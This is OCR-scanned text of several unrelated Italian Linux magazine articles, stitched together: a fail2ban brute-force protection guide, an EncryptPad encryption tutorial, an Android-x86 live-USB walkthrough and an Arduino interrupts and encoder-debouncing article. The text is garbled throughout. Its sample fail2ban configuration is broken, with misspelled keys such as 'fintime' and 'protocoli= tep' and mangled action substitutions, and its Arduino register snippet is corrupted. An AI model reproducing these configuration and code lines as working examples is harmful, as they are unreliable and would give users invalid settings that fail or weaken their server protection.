file premendo Ctr+0 seguito da Invio, e poi uscire 

con Ctrl+X, confermando. Dopo ogni modifica al 
file jail.conf, fail2ban deve essere riavviato usando il coman- 


do sudo /etc/init.d/fail2ban reload. 


Dopo un certo numero di tentativi errati, un 
indirizzo IP dovrebbe essere bannato dai login, ve- 
nendo inserito nella lista nera del firewall. Dando 


il comando sudo iptables -L vediamo tutti gli IP attualmente 
bloccati. 


Linux Magazine 43 


La definizione è abbastanza semplice: tra parentesi quadre si scrive il 
nome della jail, con il quale sarà poi possibile identificarla e controllar- 
ne lo stato (per esempio il numero di tentativi di accesso bloccati). La 
riga enabled permette di stabilire se l’utilizzo di questa jail sia abilitato 
oppure no: a volte può essere utile disabilitare il controllo degli accessi 
ad un particolare server senza dover chiudere del tutto Fail2Ban (così 
da mantenere il controllo sugli altri server) e senza dover cancellare la 
configurazione della jail.Se la riga enabled è uguale a true, allora la jail 
è attiva, se false la jail è disabilitata. La riga port permette di stabilire 
su quali porte il server sia attualmente in ascolto: per esempio Postfix 
lavora sul protocollo smtp ed ssmtp. Se non abbiamo modificato le por- 
te predefinite su Postfix, possiamo lasciare queste diciture, altrimenti 
dobbiamo scrivere il numero della porta su cui il server di posta lavora. 
La riga filter è quella che contiene il nome del filtro dedicato al server 
che vogliamo controllare: nel caso di Postfix si tratta del file postfix- 
auth. Non serve specificare il percorso ne l’estensione del file del filtro, 


bg. imedes : — Konsole 


File Modifica Visualizza Segnalibri Impostazioni Aiuto 


Per conoscere le jail attualmente attive è suf- 

ficiente lanciare sudo fail2ban-client status. Il 
comando mostra i nomi delle jail che hanno la riga enabled = 
true. Questo è utile perché a volte non ci si ricorda cosa sia 
attivo su un server. 


archimedes : — Konsole 


visto che sono sempre gli stessi per tutti i filtri. Infine, logpath indica il 
file di log che va analizzato con il filtro. 
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Fig. 1 e Scarica la configurazione perfetta per Fail2Ban 
utilizzando questo QR Code 


Se poi si vuole conoscere il dettaglio dell'operato 

di una jail basta dare il comando sudo fail2ban- 
client status seguito dal nome della jail. Ad esempio sudo 
fail2ban-client status ssh fornisce tutti gli IP attualmente 
bannati dalla connessione SSH. 


* archimedes : — Konsole 


Modifica Visualizza* Segnalibri Impostazioni Aiuto 


Se ci rendiamo conto che è stato bannato un IP 

che, invece, vorremmo potesse accedere al ser- 
ver, possiamo sbloccarlo usando il comando sudo fail2ban- 
client set ssh unbanip 192.168.1.68, dove ssh è il nome della 
jail, e l'ultimo è l'IP da sbloccare. 
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File Modifica Visualizza Segnalibri Impostazioni Aiuto 


In qualsiasi momento possiamo verificare gli 

ultimi login riusciti al nostro server dando il sem- 
plice comando last | head (oppure soltanto last). Se tutto va 
bene, dovremmo vedere soltanto login che sappiamo di aver 
autorizzato. 


Quella che abbiamo descritto finora, però, è solo la configurazione 
base: ci sono diverse altre opzioni, che possono rivelarsi multo utili. 
Analizziamo un esempio di una possibile configurazione completa: 


[DEFAULT] * 


ignoreip = 127.0.0.1 
fintime = 604800 
bantime = 604800 


maxretry.=.3 


Il file comincia con la definizione della sezione default, che contiene 
tutti i parametri che vengono . 
automaticamente applicati alle varie jail. Ad esempio, la riga ignoreip 
include tutti gli indirizzi IP che non verranno mai bloccati (nemmeno 
se si sbaglia più volte la password), il che è utile per evitare di rimanere 
chiusi fuori dal proprio server inavvertitamente. Se si scrive in tale riga 
il valore 192.168.1.0/24 tutti i computer della rete locale non verranno 
mai bloccati, e questo vale per tutte le jail. Se però per una specifica jail 
volessimo indicare degli altri indirizzi, basta aggiungere anche in essa 
la riga ignoreip, ed il suo valore avrà la precedenza su quello definito 
nella nella sezione default. Altri parametri importanti sono findtime, 
bantime, e maxretry. In poche parole, se un certo computer tenta 
l’accesso al nostro server sbagliando la password più volte di quante 
indicate in maxretry (cioè più di 3 volte) nell’arco del tempo indicato 
da findtime (604800 secondi sono 7 giorni), verrà bannato da qualsiasi 
tentativo di accesso per tutto il tempo definito in bantime (cioè altri 
7 giorni). Riassumendo, se qualcuno sbaglia password più di 3 volte 
nell’arco di una settimana, viene bannato per una settimana (la si co- 
mincia a contare dal momento dell’ultimo tentativo fallito). 


destemail = root@localhost 
backend = auto 

mta = sendmail 

banaction = iptables-multiport 
protocoli= tep 

chain = INPUT 


Si specificano, poi, alcune opzioni che riguardano l’invio di email: 
Fail2Ban può infatti utilizzare il programma sendmail per inviare un 
messaggio al nostro indirizzo di posto elettronica ogni volta che un 
IP viene bannato. Inoltre, si deve indicare come procedere al ban: la 
soluzione migliore consiste nell’aggiungere una regola iptables nella 
chain input del firewall, su protocollo tcp. Questo blocca le connessio- 
ni dall’IP bannato. 
action. = s(banaction)s[name=%(__name _) 
s, port="%(port)s", protocol="% (protocol) 
s", ‘chain="(chain).s"] 


Esistono tre tipi di azioni possibili per Fail2Ban, che vengono definite 
con apposite righe. La più semplice è action, che si limita ad avviare 
il comando iptables’con tutte le informazioni per eseguire il blocco 
dell’IP. 


s(banaction)s [name=% 
(i name »)s, port=!%(port):s! 
protocol="%(protocol)s", chain="% (chain) 
s"] $(mta)s-whois[name=%(__name )s, 


action _mw = 


dest="%(destemail)s", 
*(protocol)s", 


protocol=" 
chain="%(chain)s"] 


L'azione action_mw provvede non solo ad eseguire il comando ipta- 
bles, ma anche ad avviare il programma di invio email (mta) invian- 
doci un messaggio che contiene le informazioni di base. Utilizzando il 
servizio whois si cerca anche di risalire al nome di dominio associato 
all’indirizzo IP di chi ha tentato l’accesso, così possiamo avere una idea 
di chi sia (o almeno del paese in cui si trovi). 


s(banaction) s [name=% 
(«mame bea Dort= là (Port) 
protocol="%(protocol)s", chain="% (chain) 
s"] (mta)s-whois-lines[name=%(__ 
name _.)s, dest="%(destemail)s", 
logpath=% (logpath)s, chain="%(chain)s"] 
action = $(action )s 


action mwl = 


Infine, action_mwl fa la stessa cosa ma aggiungendo al messaggio 
email anche il file di log su cui sono registrati i falliti tentativi di acces- 
so, così possiamo controllare tutto nei dettagli. 


[ssh] 

enabled = yes 

port = ssh 

filter = sshd 

logpath = /var/log/auth.log 
bantime = -1 


maxretry.= 3 


Possiamo ora definire la nostra prima jail, ad esempio dedicata agli 
accessi SSH. Questa jail può essere abilitata impostando enabled al 
valore yes oppure true (sono equivalenti). La sua descrizione è simile a 
quella che abbiamo fatto per Postfix solo qualche pagina fa, ma stavolta 
utilizziamo il filtro, la porta, ed il file di log del server openSSH. Inol- 
tre, specifichiamo che per questo server il numero massimo di tentativi 
maxretry è 3, e che diversamente da quanto valga per tutte le altre jail, 
nel caso di SSH il bantime è -1. Quando il tempo di ban è impostato 
a -1, significa che il blocco dell’IP non scade mai, rimane permanente. 


luca: bash — Konsole 


File Modifica Visualizza 


Segnalibri 


Impostazioni Aiuto 


® Fig. 2 è Per conoscere tutti i filtri già disponibili basta il 
comando Is /etc/fail2ban/filter.d/ 
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a privacy e la sicurezza informatica sono 
temi sempre molto caldi, proprio per- 
ché i pirati sono sempre dietro l'angolo. 
E, se sul nostro PC sono presenti documenti di testo 
altamente riservati (che contengono ad esempio i 
dati di accesso al nostro conto bancario o file del- 
la nostra azienda assolutamente top secret) forse 
è il caso di trovare un modo per tenerli davvero al 
riparo. Come? Semplicemente cifrandoli con un 


BLINDA | TUOI FILE 
PIÙ IMPORTANTI! 


I nostri esperti ti spiegano-come proteggere con 
una chiave anti-pirata i tuoi documenti di testo 


semplice tool: EncryptPad che ci consente di editare 
documenti di testo direttamente dall'editor integrato 
o proteggere file già esistenti. La corretta visualiz- 
zazione del documento sarà consentita unicamente 
a chi conosce la password di accesso (Passphrase) 
o la chiave condivisa. L'algoritmo utilizzato è AES- 
256, allo stato attuale il più sicuro in circolazione, 
ma qualora lo preferissimo potremmo comunque 
decidere di utilizzarne uno diverso. 


vincosentux@vincosentux: — 
$ sudo add-apt-reposi 
[sudo] password di vincosentux: i, 
The main Web Upd8 PPA maiîntained by: http://w 


To add this PPA, simply paste this in a termi 
sudo add-apt-repository ppa:nilarimogard/webup 


Avviamo il terminale e da qui lanciamo il comando 
sudo add-apt-repository ppa:nilarimogard/we- 
bupd8 per aggiungere il repository che include la release più 
recente di EncryptPad. 


Set Passphrase 


|. Cancel. | 


Passphrase: 


ECCO LA GUI 

Yi) Spostiamoci nella Dash. Ricerchiamo ed avviamo 
LL EncryptPad. L'interfaccia grafica è molto intuiti- 
va: digitiamo il testo che vogliamo e clicchiamo su Set Pass- 
phrase per settare una password. Salviamo con 0K. 
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Terminale 


vincosentux@vincosentux: — 


Lettura elenco dei pacchetti... Fatto 
S sudo apt install en 
Lettura elenco deî pacchetti... Fatto 
Generazione albero delle dipendenze 
Lettura informazioni sullo stato... Fatto 
The following additional packages will be inst 
libbotan-1.10-1 


SETUP Il 5 
Aggiorniamo l'elenco dei pacchetti con sudo apt- 
get update e, successivamente, lanciamo il co- 
mando sudo apt install encryptpad encryptcli per installare 


tutto l'occorrente. L'operazione richiede pochi secondi. 


Save File As 


| i /nome/vincosentux/Scrivania 


Computer 
188 vincosentu 


Name 


A questo punto, salviamo il nostro file cliccando 
banalmente su Save: indichiamo il percorso nel 
quale memorizzarlo e indichiamo un relativo nome. Con- 
fermiamo cliccando ancora una volta su Save. 


File a prova di bomba! 


Addentriamoci nell'uso di EncrypiPad e personalizziamo l'algoritmo di cifratura da utilizzare 


Editor di testo 


testo.txt (-/Scrivania) - gedit 


FA 


Locale attuale {UTF-8} 


IMPOSSIBILE DA APRIRE 

Se proviamo ad aprire con un qualsiasi altro editor 

di testo (ad esempio Gedit) un file che abbiamo pre- 
cedentemente editato e cifrato con EncryptPad vedremo solo 
una serie incomprensibile di caratteri. Ciò, semplicemente 
perché il file è criptato. 


File Encryption 


Parameters 
Encryption: 


O | becrypt 


@ (2 Encrypt 


Files 
Format: 


Input File: 


Output File: 


am 


Mniiotcira: 


TIPO DI CIFRATURA 

Se vogliamo scegliere il tipo di cifratura da applicare 

spostiamoci in File Encryption. Da qui, clicchiamo 
su Encrypt e, da Format, scegliamo EPD o GPG. Indichiamo il 
percorso di output e il file di input (può anche essere un file già 
esistente] e confermiamo con Start. 


File Properties 


Algorithm: AES-256 (recommended) + 

Hash: (SHA-256 ni 

Iterations: fio1s808  — —° © v 

Salt: 

Compression: Alieni 
L'ALGORITMO PERFETTO 


05 In EncryptPad, spostiamoci nel menu Preferen- 

ces e da qui clicchiamo su Edit in corrispondenza 

di Default file properties. Nella nuova finestra che appare, 

possiamo scegliere l'algoritmo da utilizzare (di default AES- 
256) il tipo di Hash e la compressione. 


CON IL GIUSTO EDITOR 

Se vogliamo visualizzare correttamente il file ci- 

frato, ci toccherà aprirlo con EncryptPad (esatta- 
mente tramite il menu Open). Prima di visualizzare il conte- 
nuto del testo, ci viene richiesto l'inserimento della password 
settata in precedenza. 


| E î 
E pasfi-MpE>E] >. BED)? 
(cA3IRM70<-f4-[ikezctel]u{]: = MMossaMIMcoy=e È 

N EoAs[Eindo Fast Hive Aryat.rye”e Ro 
6) 10098 let>M BEE]. eds "ii Ditte: | ; 


FRE TIT VETRI AITA.IISTTIEVSItare FISOSTItitttiCI 


TUTTO OK? 

Per verificare che tutto sia andato per il verso giu- 

sto, proviamo ad aprire il file che abbiamo cifrato 
con GPG utilizzando qualsiasi altro editor di testo. Se appaio- 
no caratteri incomprensibili è ovviamente segno che l'opera- 
zione è andata a buon fine. 


Preferences 


Font monospace (Size: 9) __ Font 
E word wrap 


‘ D {fwiindows" end of line: CR+LF 


Recent files: 5 È 


(4 Save last used directory 


PREFERENZE DELL'EDITOR 

Se vogliamo personalizzare anche le preferenze 

dell'editor di testo, possiamo farlo sempre dal menu 
Preferences. Ad esempio, possiamo scegliere il tipo di font prede- 
finito, come la dimensione standard da utilizzare o il numero di file 
recenti da visualizzare. 


ved 


è & 
CiD) 
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ndroid è senza dubbio alcuno il sistema 

operativo mobile più utilizzato dal mon- 

do e le sue radici in GNU/Linux non 
possono che riempire di orgoglio tutti gli utenti del 
Pinguino. Con ogni probabilità, infatti, se utiliz- 
ziamo una qualsiasi distro GNU/Linux sarà vera- 
mente difficile che il nostro fedele smartphone si 
un iPhone o, peggio ancora un Windows Phone. E 
se magari sviluppiamo applicazioni per l'OS mo- 
bile firmato Google, riuscire ad avere una copia di 


UN ANDROID 
PER AMIGO 


Grazie al progetto Android-x86, utilizzare l'0S mobile 
anche sul computer è un gioco da ragazzi. Ecco come fare 


Android funzionante anche sul nostro PC potrebbe 


, essere un grande vantaggio. Una soluzione c'è ed 


il suo nome è Android-x86. Il progetto esiste già 
da diversi anni e, ad oggi, vanta una buona schiera 
di fan e sviluppatori a tal punto che nuove release 
vengono rilasciate con una certa costanza. Al mo- 
mento in cui scriviamo, ad esempio, è disponibile 
al download il porting di Android 6.0 (utilizzato 
per i nostri test). Pensiamo sia complicato? Ci sba- 
gliamo di grosso! 


Dal PC, avviamo il browser che preferiamo e raggiun- 

giamo la pagina Web www.android-x86.0rg/download. 
Da qui, spostiamoci nella sezione dell'ultima release disponibile 
{nel nostro caso Android-x86 6.0) e clicchiamo su View. 


Apri File Immagine 


Lookin: fa home,vincosentux (o 
{2 computer [î9] testdisk-7.0 


Mi android-x86-6.0-r1.iso 
image.dd 

> shots_1.0.4_amd64.deb 
testdisk-7.0.linux26.tar.bz2 
Tor-polipo.sh 

3) wpscanteam-wpscan-2.9.2-25-g487a483.zip 


Al termine, ricerchiamo dalla Dash Unetbootin ed av- 

viamolo. In corrispondenza di Immagine disco, clic- 
chiamo su Sfoglia e raggiungiamo il percorso nel quale abbiamo 
salvato l'immagine ISO di Android x86. Confermiamo con Open. 


0998 
2008 
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Al termine del download dell'immagine ISO, av- 
viamo il terminale e lanciamo il comando sudo 
apt-get install unetbootin. Al termine dell'installazione, in- 
seriamo una pendrive USB in un ingresso disponibile del PC. 


UNetbootin 


Da Tipo, indichiamo Unità USB e da Unità indichiamo 

la pendrive USB inserita in precedenza. Non ci re- 
sta che confermare con 0K. Attendiamo pazientemente la fine 
dell'operazione (potrebbero essere necessari diversi minuti). 


Proprio come su uno smartphone 


Configuriamo Android-x86 e iniziamo subito a scaricare app dal nostro PC 


ESA mode: 
Ebug, made 
Stallation — 


nstall Android—56 to harddisk 


_» AVVIODI ANDROID 
0 $ Dopo aver creato la pendrive USB live, riavviamo il 
«|_’PC e accediamo alle opzioni di boot: decidiamo di 
avviare il PC tramite periferica esterna USB. Dopo qualche se- 
condo appare il menu di boot di Android-x86. Premiamo Invio 
su Live CD - Run Android-x86 without installation. 


Se utilizzi un altro dispositivo Android, puoi copiare 
rapidamente la configurazione corrente su questo VirtualBox. 


lo) Copia account Google, app e dati dall'altro 
dispositivo 


No, grazie 


IMPORTIAMO | DATI? 
«> Se vogliamo importare le impostazioni e i file da un 
altro dispositivo (un tablet o uno smartphone An- 
droid) selezioniamo l'opzione Copia account Google, app e dati 
dall'altro dispositivo. In caso contrario, scegliamo No, grazie e 
proseguiamo con Avanti. 


Se accedi accetti i Termini di servizio e le 
Norme sulla privacy 


Non accedere 


FEMSTVOTELE ANI TOETTTIFIITATERE ARTI IESITOVENIEF I SISTITIIIIIIZI PIT ATISIITI PONS APERTA ATF 


CONDIZIONI D'USO 
0 x Al termine di questa fase, prima di poter utilizza- 
re Android anche dal PC, è necessario accettare i 
termini di servizio e le norme sulla privacy di Google. Per 
farlo, ci basta semplicemente premere Accetta e attendere 
qualche secondo affinché l'OS venga preparato. 


RIPRESI DI ORENIT FIT PATATE TENTERPITSIFI ANI TIC 


CAMBIAMO LA LINGUA 
02 Appare dunque l'interfaccia di configurazione ini- 
ziale di Android: non è possibile bypassare questa 
fase perché, in caso contrario, non sarà possibile utilizzare 
l'OS mobile dal nostro PC. Indichiamo la lingua che preferiamo 
(l'Italiano è presente) e confermiamo con Invio. 


Google 


Accedi per usare al meglio il tuo dispositivo. Utterion 
informazioni 


Indirizzo email o numero dî telefono 


Oppure crea un nuovo account 


ITSOIFTATISIV ERE VIAISVNISIT MATERIE VICI ISTSTFITIITAIZIONI DIDONE NET ta 


IL GOOGLE ACCOUNT 
TA È arrivato il momento di fornire un indirizzo e-mail 
Res già associato a Google (quello di GMail). Nel caso in 
cui non volessimo utilizzare un indirizzo esistente, possiamo 
optare per Oppure crea un nuovo account. Effettuata la no- 
stra scelta, confermiamo con Invio. 


di: 
sana 


senti ECCO LA GUI! 
0 5 Ecco apparire l'interfaccia grafica principale di Android- 


x86 [la versione che abbiamo utilizzato per i nostri test 
è la 6.0). Da questo momento, potremmo utilizzare Android sul 
nostro PC proprio come se fossimo dallo smartphone (possiamo 
scaricare nuove applicazioni, navigare, ecc). 


000 
sese 


.._ ®© 
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Arduino tiene 


il tempo! 


Scopriamo come gestire gli interrupt con la scheda di prototipazione Open 
Source e creare uno strumento fondamentale per ogni musicista 


Il software completo lo trovi su www.edmaster.it/trl/6577 


ità pC) può essere “solo” una parte (anche se il cuore) di un 
sistema più ampio che può includere un sistema di immagazzi- 
namento software e/o dati (ad esempio, una EEPROM - Electri- 
cally Erasable Programmable Read-Only Memory), dispositivi 
di Input/Output (I/O), un front-end analogico e molto altro ancora. 
Ogni uC possiede un proprio set di istruzioni necessarie affinché le 


| n un progetto hardware un microcontrollore (per semplic- 


circuiterie interne siano a disposizione, via software, di chi voglia 
utilizzarle in funzione del progetto che ci si accinge a realizzare. 
Il uC a bordo dell’ Arduino Uno, l' ATmega328P è un sistema ad 
architettura RISC caratterizzato da un set di 131 istruzioni. Coloro 
i quali volessero approfondire ulteriormente il tipo di istruzioni 
con associati operandi, possono fare riferimento al paragrafo 36, 
pagina 432, del datasheet completo scaricabile al link fornito ad 
inizio articolo. 


DALL’IDE ALL'ESECUZIONE 


Focalizziamo l’attenzione su un classico programma che possiamo 
scrivere e in seguito caricare nel uC utilizzando l’IDE Arduino. 
Il programma è in genere caratterizzato da variabili, commenti, 
funzioni poste tra parentesi graffe (le tipiche sono void setup() 
e void loop()), istruzioni che terminano con il carattere “;” e 
chiamate a funzioni esterne con i loro argomenti (se accettati). 
Queste ultime sono le cosiddette API (Application Programming 
Interface) e fanno parte delle librerie che l’ambiente di sviluppo 
integrato mette a disposizione (pinMode(), digitalWrite(), ecc). 
Andando ad indagare un po’ più a fondo — ad esempio, dopo aver 
installato l’IDE, in /usr/share/arduino/hardware/arduino/avr/ 
cores/arduino - su come sono scritte queste funzioni, troveremo 
righe del tipo: 


TCCROB = (TCCROB & 0b11111000) | prescalarbits; 


sbi(TCCRO, CS02); 
chi(ADCSRA, ADPSO); 
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La prima istruzione esegue un’assegnazione del Timer/Counter 
Control Register B, variabile TCCROB dopo averne fatto prima un 
AND bit a bit con la maschera riportata, seguito da un OR bit a bit 
con la variabile indicata. Il registro è presente fisicamente nel uC: ha 
dimensione di 8 bit e per approfondirne le singole funzioni possiamo 
leggere il paragrafo 19.9.2, pagina 141, del datasheet. La seconda 
riga è il codice mnemonico di una delle 131 istruzioni supportate dal 
uC: Set Bit I/O (sbi) imposta i bit nei registri di Input/Output. La 
sua complementare è cbi (Clear Bit I/O) che nello specifico imposta 
a 0 il bit 0 di nome ADPS0 (ADC Prescaler Select) del registro 
ADCSRA (ADC Control and Status Register A, paragrafo 28.9.2, 
pagina 319 del datasheet). Entrambe, per completare l’operazione, 
utilizzano 2 cicli di clock. Per motivi di spazio abbiamo riportate solo 
3 righe, ma in realtà dovremmo essere già avvezzi a manipolazioni 
dirette dei registri poiché abbiamo utilizzato questo metodo per il 
circuito integrato DS3234, un RTC (Real-Time Clock) riportato nel 
numero 167 (Maggio/Giugno 2016). 

Perquantoriguardale istruzioni, invece, queste sonoriportate incodice 
mnemonico (opcode) dell’assembly del uC. L’opcode specifica cosa 
l'istruzione chiede di fare alla macchina. È un nome simbolico che 
corrisponde ad un’istruzione. L'analogia è con gli indirizzi Internet: 
è più facile ricordare miosito.com e non un indirizzo IP del tipo 


QUALCHE PRECISAZIONE 


Alcuni termini da conoscereso" 


Acronimo di Reduced Instruction Set Computer, RISC indica 
un'architettura nella quale si punta alla minimizzazione del 

. numero di cicli macchina per la maggior parte delle istruzioni 
che, grazie alla loro semplicità, possono essere eseguite in 

- un solo ciclo di clock spostando così la complessità dell’har- 

‘ dware al software. Di segno opposto l'architettura CISC 
(Complex Instruction Set Computer) nella quale si è puntato 
alla potenza delle istruzioni con una complessità tale da 
necessitare dapprima di una fase di interpretazione seguita 
dalla loro esecuzione, passaggi che inevitabilmente necessi- 
tano di vari cicli di clock. Esempi CISC sono i processori X86/ 
X86_64 a bordo dei nostri PC. 


72.144.87.198. Nello specifico, i nomi mnemonici come ADD, 
NEG, COM si ricordano più facilmente rispetto ai corrispondenti 
codici delle istruzioni che possono essere qualcosa del tipo 1001, 
0101 o equivalenti in esadecimale. Gli operando di una opcode 
specificano i dati sui quali la macchina dovrà operare. Ma nell’IDE 
Arduino vengono riportate delle istruzioni in un linguaggio di 
“alto livello”, molto simile al C++, il quale non è “comprensibile” 
dal uC. Cosa succede, allora, quando pigiamo sull’icona di 
caricamento? Nella shell dell’IDE si avvicenderanno una serie di 
righe. AI di là dei warning, e ipotizzando che non vi siano errori 
nel codice, principalmente abbiamo varie chiamate al compilatore 
avr-g++ dove il sorgente viene compilato e assemblato in un file 
oggetto (estensione .0) ma non linkato. Il linking alle librerie 
avviene in una chiamata successiva che genererà il programma 
nel formato eseguibile ELF (Executable and Linkable Format). 
Solo a questo punto viene invocato il tool avr-objcopy che 
convertirà il formato ELF in un file HEX (esadecimale) per poi 
essere caricato nella flash memory del uC dal tool avrdude. 
Allora è intuitivo come, in un programma da decine o centinaia 
di righe di codice, tutte le istruzioni vengano “trasformate” nei 
corrispondenti codici equivalenti delle istruzioni supportate dal 
uC. A questo punto, con una descrizione elementare, possiamo 
dire che il uC legge l’opcode della prima istruzione in memoria e 
la esegue; quindi ripete lo stesso processo sull’opcode disponibile 
nel byte successivo di memoria programma e così via. Esistono, 
però, situazioni nelle quali questa modalità potrebbe risultare 
largamente inefficiente e, in alcuni casi, pericolosa poiché non 
assicura l’esecuzione di un dato codice entro un certo tempo 
(deadline) al verificarsi di una data condizione. Per questo 
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® Fig. 1 * Linea di interrupt e esecuzione della ISR 


motivo la maggior parte dei yC possono essere programmati per 
trattare eventi non schedulati nell’usuale ciclo di esecuzione delle 
istruzioni. Parliamo di eventi che non si verificano con scadenze 
temporali fisse e note, risultando asincrone rispetto alla modalità 
di esecuzione di cui sopra, e che necessitano di un livello di 
priorità differente a seconda delle esigenze. La feazione del yC 
deve essere opportunamente pianificata dal programmatore al 
fine di assicurarsi la risposta a eventi di questo tipo. Ma come 
fa il uC a sapere quando si verifica un evento a cui prestare 
immediatamente attenzione? 


GESTIONE DELLE INTERRUZIONI 


L’interrupt, o interruzione, è un evento che permette di modificare 
l’esecuzione sequenziale delle istruzioni del programma in corso 
qualora si verifichi una data situazione, accidentale o voluta che sia. 
Questa condizione deve essere gestita all’atto del suo verificarsi: 
il uC deve sospendere immediatamente l’attuale esecuzione per 
passare ad una parte specifica (branch) del programma, meglio 
nota con il nome di Interrupt Service Routine (ISR) con la 
quale potrà servire l’avvenuta interruzione. Dal punto di vista 
dell’esecuzione del programma, le cose rimangono perfettamente 
analoghe a quanto riportato in precedenza: non appena l’ISR 
termina il suo compito, il uC riprende il programma a partire 
dal punto in cui era stato interrotto. La ISR verrà richiamata nel 
momento in cui si verificherà — se si verificherà — una nuova 
interruzione. Il vantaggio della (e nella) gestione delle interruzioni 
è di fornire una risposta rapida all’evento verificatosi cosa che 
non sarebbe garantita dall’usuale modalità di esecuzione, ad 
esempio una lettura ciclica dello stato di una periferica al fine di 
verificare l’accadimento o meno dell’evento, modalità nota con il 
nome di polling. 

Dal punto di vista pratico l’interruzione si identifica in una 
variazione del livello di tensione (condizione logica) su un dato 
pin del uC. Questa situazione è gestita direttamente all’interno del 


MODALITÀ DI INTERRUPT 


Interne, esterne e mascherate 


Le possibili situazioni che possono richiedere l'interruzione 
temporanea del programma in esecuzione sono classificabili 
in due gruppi: interruzioni esterne, ovvero segnali esterni 
che condizionano direttamente il pin del pC e le interruzioni 
interne provenienti, ad esempio, da registri, contatori, com- 
paratori e altro presente nel pC. Le linee fisiche dedicate agli 
interrupt in genere sono limitate per questo motivo si ricorre 
agli interrupt vettorizzati. Ad esempio, la tabella 16.1 a pa- 
gina 82 del datasheet mostra interrupt vettorizzati riportati 
per ordine di priorità: prima il pulsante di reset seguito dalle 
due linee di interrupt esterni. Osserviamo come durante 
l'esecuzione di un programma sia possibile disabilitare le 
interruzioni “mascherandole” (istruzione assembly cli) per 
poi riabilitarle (istruzione sei). Queste istruzioni scrivono uno 
Qoun1inuno specifico registro. 
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C e, tramite apposite istruzioni, è controllabile via software. Per 
il uC utilizzato nella Arduino Uno due sono le funzioni riservate 
allo scopo: interrupts() e attachInterrupt() con le corrispondenti 
funzioni per la disabilitazione dell’interrupt, noInterrupts() e 
detachInterrupt(). Dal punto di vista fisico 1’ ATMega328 presenta 
due linee esterne di interrupt associate ai pin 4 e 5 (ingressi 
digitali 2 e 3 della scheda Arduino Uno). A intervalli regolari il 
uC verifica lo stato dei flag di interrupt e qualora corrisponda 
alla condizione impostata via software esegue la ISR la quale può 
essere eseguita in diverse modalità. La frequenza con la quale 
il uC esegue la ISR è visibile in Fig. 1. Come è stato ottenuto 
questo risultato? Dopo aver impostato la modalità low, al pin 4 
del uC (pin 2 uscite digitali sul connettore della Arduino Uno) 
è stato collegato un generatore di segnali alla frequenza di 1KHz 
(traccia blu). L'uscita — traccia gialla - è stata presa al pin 13 
del uC (pin 8 uscita digitale della scheda). Questo semplice test 
mostra come l’esecuzione della ISR avvenga ad una frequenza di 
poco inferiore ai 50kHz (un periodo di circa 20ps!). Sempre in 
Fig. 1, la parte in basso riporta la frequenza di esecuzione della 
ISR per la ISR gestita in modalità rising (fare riferimento allo 
sketch Test_interrupt.ino). 


TRASDUTTORI 
DI POSIZIONE ANGOLARE 


Noto anche con il nome rotary encoder (encoder rotativi), nella 
accezione più generica è un dispositivo che permette di codificare 
in una sequenza di segnali elettrici la rotazione di un albero. In 


commercio si possono avere diversi tipi di encoder in funzione 


& Fig. 2 è Eliminare gli impulsi spuri con un filtro RC 
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del principio di funzionamento sul quale si basano: meccanici, 
ottici (laser, infrarossi) o sfruttando l’effetto Hall. Il principio 
di funzionamento può essere ricondotto a degli interruttori che 
ciclicamente, in funzione della rotazione dell’albero, chiudono 
dei contatti fornendo così su di essi una condizione logica 0 
(tensione 0 V) oppure una condizione logica 1 (massima tensione 
positiva). Si possono differenziare in encoder assoluti e relativi. 
Gli encoder assoluti forniscono un segnale (binario o in codice 
Gray) che indica in ogni istante la posizione dell’albero: in caso 
di spegnimento del sistema, alla successiva riaccensione, fornisce 
l’esatta posizione dell’albero. Gli encoder assoluti possono essere 
a singolo giro fino a 4096 giri. 

A seconda del modello il segnale fornito può essere trasferito con 
una interfaccia parallela, su bus seriale (SSI - Synchronous Serial 
Interface) oppure possiedono già un’interfaccia per bus Profibus, 
CanBus o InterBus. Gli encoder incrementali forniscono due 
forme d’onda squadrate e sfasate tra di loro di 90° (4 di periodo) 
e solitamente indicate con le lettere A e B: per tale motivo 
vengono definiti anche encoder incrementali in quadratura. Dalla 
lettura di un solo canale si può risalire alla velocità di rotazione 
e l’acquisizione del secondo canale permette di ricavarne anche 
il verso. Esistono encoder incrementali che presentano un terzo 
canale detto Z o Zero che fornisce un impulso sul punto zero 
dell’albero. Altri tipi di encoder incrementali, più complessi, ad 
esempio utilizzati come segnali di retroazione su motori elettrici 
come gli encoder incrementali con segnali di commutazione 
integrati che esulano da questo contesto. 


ELIMINARE CONTEGGI IMPROPRI 


Gli encoder più economici — che per tali progetti si rivelano anche 
i più pratici da utilizzare - vedono al loro interno dei contatti 
striscianti i quali, in funzione della posizione dell’asse, attivano 
questa o quella uscita. Contatti meccanici che generano qualche 
problematica: oltre all’usura con il tempo (il produttore dichiara 
nei propri datasheet un ciclo di vita medio) abbiamo anche il 
problema legato ad una commutazione meccanica che genera il 
cosiddetto “rimbalzo” (bounce). Cos'è un rimbalzo? Pensiamo 
ad un pulsante normalmente aperto (in gergo N.A.). Quando 
premuto per chiudere il circuito non passa mai istantaneamente 
alla posizione di chiuso ma, a causa delle asperità superficiale 
dei contati nonché in funzione della pressione esercitata e 
dell’assestamento della molla nel caso di interruttori, nei primi 
millisecondi si hanno delle alternanze di chiuso-aperto che 
provocano i cosiddetti “rimbalzi”. Se un comportamento di 
questo tipo non crea alcun problema qualora si debba accendere 
una lampadina o un impianto di auto-ritenuta per motori elettrici, 
problemi invece sorgono nel momento in cui questo pulsante 
è collegato ad un circuito elettronico, ad esempio un contatore 
poiché anche se pigiamo il pulsante una sola volta, a causa del 
rimbalzo vengono conteggiati più impulsi. Esistono diversi modi 
per realizzare un sistema di debouncing (anti-rimbalzo). Il più 
semplice e immediato è un debouncing hardware utilizzando un 
filtro passa-basso RC. In Fig. 4 è visibile il primo prototipo: il 
gruppo di resistenze/condensatori presenti vicino all’encoder 
realizzano il filtro in questione. Per lo schema elettrico e 


il cablaggio su breadboard fare riferimento al file allegato 
Metronomo.fzz utilizzando il programma Fritzing ( http:// 
fritzing.org) presente nei repository ufficiali di buona parte 
delle distribuzioni. Se abbiamo a disposizione un oscilloscopio, 
l’utilità del filtro anti-rimbalzo diventa ancora più evidente se 
effettuiamo un semplice esperimento. Dallo schema elettrico del 
circuito completo estrapoliamo e realizziamo in pratica solo la 
parte associata all’encoder con i due filtri RC (Fig. 3). 

Al canale 1 Colleghiamo due canali dell’oscilloscopio prima del filtro RC e 
alimentiamo il circuito. Ruotiamo l’albero dell’encoder. Avremo 
due onde in quadratura apparentemente quadre (schermo in alto 
nella metà superiore in Fig. 2) la cui durata è funzione della 
velocità di rotazione dell’albero. Ingrandendo una parte che 
